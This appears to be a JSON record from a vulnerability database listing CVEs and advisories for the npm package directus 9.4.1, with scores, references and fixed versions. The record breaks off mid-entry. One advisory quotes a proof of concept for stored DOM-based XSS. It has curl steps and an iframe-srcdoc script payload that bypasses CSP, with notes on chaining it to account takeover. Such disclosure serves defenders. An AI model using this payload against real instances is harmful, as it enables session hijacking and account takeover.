Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/548153?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/548153?format=api", "purl": "pkg:npm/directus@9.4.1", "type": "npm", "namespace": "", "name": "directus", "version": "9.4.1", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "11.17.0", "latest_non_vulnerable_version": "11.17.0", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/105428?format=api", "vulnerability_id": "VCID-32e6-c1bv-efea", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0 and prior to version 11.9.0, when using Directus Flows with the WebHook trigger all incoming request details are logged including security sensitive data like access and refresh tokens in cookies. Malicious admins with access to the logs can hijack the user sessions within the token expiration time of them triggering the Flow. Version 11.9.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53886", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0031", "scoring_system": "epss", "scoring_elements": "0.54729", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.0031", "scoring_system": "epss", "scoring_elements": "0.54713", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.0031", "scoring_system": "epss", "scoring_elements": "0.54588", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53886" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53886", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53886" }, { "reference_url": "https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb", "reference_id": "22be460c76957708d67fdd52846a9ad1cbb083fb", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/" } ], "url": "https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb" }, { "reference_url": "https://github.com/directus/directus/pull/25354", "reference_id": "25354", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/" } ], "url": "https://github.com/directus/directus/pull/25354" }, { "reference_url": "https://github.com/advisories/GHSA-f24x-rm6g-3w5v", "reference_id": "GHSA-f24x-rm6g-3w5v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f24x-rm6g-3w5v" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-f24x-rm6g-3w5v", "reference_id": "GHSA-f24x-rm6g-3w5v", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-f24x-rm6g-3w5v" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.9.0", "reference_id": "v11.9.0", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.9.0" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/378353?format=api", "purl": "pkg:npm/directus@11.9.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0" } ], "aliases": [ "CVE-2025-53886", "GHSA-f24x-rm6g-3w5v" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-32e6-c1bv-efea" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/40734?format=api", "vulnerability_id": "VCID-54ja-4vrx-tbgm", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. An unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include redirect query string. This happens because on that endpoint for both OpenId and Oauth2 Directus is using the respond middleware, which by default will try to cache GET requests that met some conditions. Although, those conditions do not include this scenario, when an unauthenticated request returns user credentials. This vulnerability is fixed in 10.13.3 and 11.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-45596", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00753", "scoring_system": "epss", "scoring_elements": "0.7374", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00753", "scoring_system": "epss", "scoring_elements": "0.7365", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00753", "scoring_system": "epss", "scoring_elements": "0.73741", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00753", "scoring_system": "epss", "scoring_elements": "0.73725", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-45596" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428" }, { "reference_url": "https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459" }, { "reference_url": "https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b", "reference_id": "4aace0bbe57232e38cd6a287ee475293e46dc91b", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/" } ], "url": "https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b" }, { "reference_url": "https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52", "reference_id": "769fa22797bff5a9231599883b391e013f122e52", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/" } ], "url": "https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45596", "reference_id": "CVE-2024-45596", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45596" }, { "reference_url": "https://github.com/advisories/GHSA-cff8-x7jv-4fm8", "reference_id": "GHSA-cff8-x7jv-4fm8", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cff8-x7jv-4fm8" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8", "reference_id": "GHSA-cff8-x7jv-4fm8", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/33327?format=api", "purl": "pkg:npm/directus@10.13.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/33329?format=api", "purl": "pkg:npm/directus@11.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-3vnr-k31f-vycv" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-ghbw-eqaz-jqhs" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0" } ], "aliases": [ "CVE-2024-45596", "GHSA-cff8-x7jv-4fm8" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-54ja-4vrx-tbgm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360571?format=api", "vulnerability_id": "VCID-79ch-vtkp-q3cd", "summary": "Directus has a DOM-Based cross-site scripting (XSS) via layout_options\n### Impact\nDirectus allows an authenticated attacker to save cross site scripting code to the database. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with [CVE-2024-6534](https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86), it could result in account takeover.\n\n### PoC\nTo exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account.\n\n1. Upload the following JavaScript file.\n\nUsing the upload functionality at `POST /files`. This PoC will show an alert message.\n\n```js\nexport TARGET_HOST=\"http://localhost:8055\"\nexport ATTACKER_EMAIL=\"malicious@malicious.com\"\nexport ATTACKER_PASSWORD=\"123456\"\nroot_dir=$(dirname $0)\nmkdir \"${root_dir}/static\"\n\ncurl -s -k -o /dev/null -w \"%{http_code}\" -X 'POST' \"${TARGET_HOST}/auth/login\" \\\n -c \"${root_dir}/static/attacker_directus_session_token\" \\\n -H 'Content-Type: application/json' \\\n -d \"{\\\"email\\\":\\\"${ATTACKER_EMAIL}\\\",\\\"password\\\":\\\"${ATTACKER_PASSWORD}\\\",\\\"mode\\\":\\\"session\\\"}\"\n\nid_url_file=$(echo \"alert('Successful DOM-based XSS')\" |\n curl -s -k -X 'POST' \"${TARGET_HOST}/files\" \\\n -b \"${root_dir}/static/attacker_directus_session_token\" \\\n -F \"file=@-;type=application/x-javascript;filename=poc.js\" | jq -r \".data.id\")\n```\n\n2. Create a preset for a collection and store the preset ID.\n\nOr use a preset already created from GET /presets. The following example uses the direct_users preset.\n\n```\nattacker_user_id=$(curl -s -k \"${TARGET_HOST}/users/me\" \\ -b \"${root_dir}/static/attacker_directus_session_token\" | jq -r \".data.id\") curl -i -s -k -X 'POST' \"${TARGET_HOST}/presets\" \\ -H 'Content-Type: application/json' \\ -b \"${root_dir}/static/attacker_directus_session_token\" \\ --data-binary \"{\\\"layout\\\":\\\"cards\\\",\\\"bookmark\\\":null,\\\"role\\\":null,\\\"user\\\":\\\"${attacker_user_id}\\\",\\\"search\\\":null,\\\"filter\\\":null,\\\"layout_query\\\":{\\\"cards\\\":{\\\"sort\\\":[\\\"email\\\"]}},\\\"layout_options\\\":{\\\"cards\\\":{\\\"icon\\\":\\\"account_circle\\\",\\\"title\\\":\\\"<iframe srcdoc=\\\\\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\\\\\">\\\",\\\"subtitle\\\":\\\"{{ email }}\\\",\\\"size\\\":4}},\\\"refresh_interval\\\":null,\\\"icon\\\":\\\"bookmark\\\",\\\"color\\\":null,\\\"collection\\\":\\\"directus_users\\\"}\"\n```\n\nWhen the user visits the view that uses the directus_users preset, the JavaScript file will be executed.\n\nNotes:\n\nNeed to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. The payload structure is `<iframe srcdoc=\\\"<script src='URL_MALICIOUS_FILE'> </script>\\\">`.\n\nWe can target any collection that uses the vulnerable template structure that renders the layout option section.\n\nIn this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover.", "references": [ { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw" }, { "reference_url": "https://github.com/advisories/GHSA-9qrm-48qf-r2rw", "reference_id": "GHSA-9qrm-48qf-r2rw", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9qrm-48qf-r2rw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/377107?format=api", "purl": "pkg:npm/directus@11.3.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.3.3" } ], "aliases": [ "GHSA-9qrm-48qf-r2rw" ], "risk_score": 1.6, "exploitability": "0.5", "weighted_severity": "3.1", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-79ch-vtkp-q3cd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/166718?format=api", "vulnerability_id": "VCID-8ch7-zwuu-zufp", "summary": "In Directus before 9.7.0, the default settings of CORS_ORIGIN and CORS_ENABLED are true.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-26969", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00909", "scoring_system": "epss", "scoring_elements": "0.76336", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00909", "scoring_system": "epss", "scoring_elements": "0.76345", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00909", "scoring_system": "epss", "scoring_elements": "0.7635", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00909", "scoring_system": "epss", "scoring_elements": "0.76265", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-26969" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/pull/12022", "reference_id": "12022", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/" } ], "url": "https://github.com/directus/directus/pull/12022" }, { "reference_url": "https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md", "reference_id": "config-options.md", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/" } ], "url": "https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md" }, { "reference_url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS", "reference_id": "CORS", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/" } ], "url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26969", "reference_id": "CVE-2022-26969", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26969" }, { "reference_url": "https://github.com/advisories/GHSA-g27j-74fp-xfpr", "reference_id": "GHSA-g27j-74fp-xfpr", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-g27j-74fp-xfpr" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr", "reference_id": "GHSA-g27j-74fp-xfpr", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr" }, { "reference_url": "https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822", "reference_id": "SNYK-JS-DIRECTUS-2441822", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/" } ], "url": "https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v9.7.0", "reference_id": "v9.7.0", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v9.7.0" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/20019?format=api", "purl": "pkg:npm/directus@9.7.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-9t8b-59vc-kbea" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-b8ya-2bmn-e3h5" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-bsua-aktm-1qfd" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eb1b-zvas-muey" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u121-7x5t-3fcg" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": 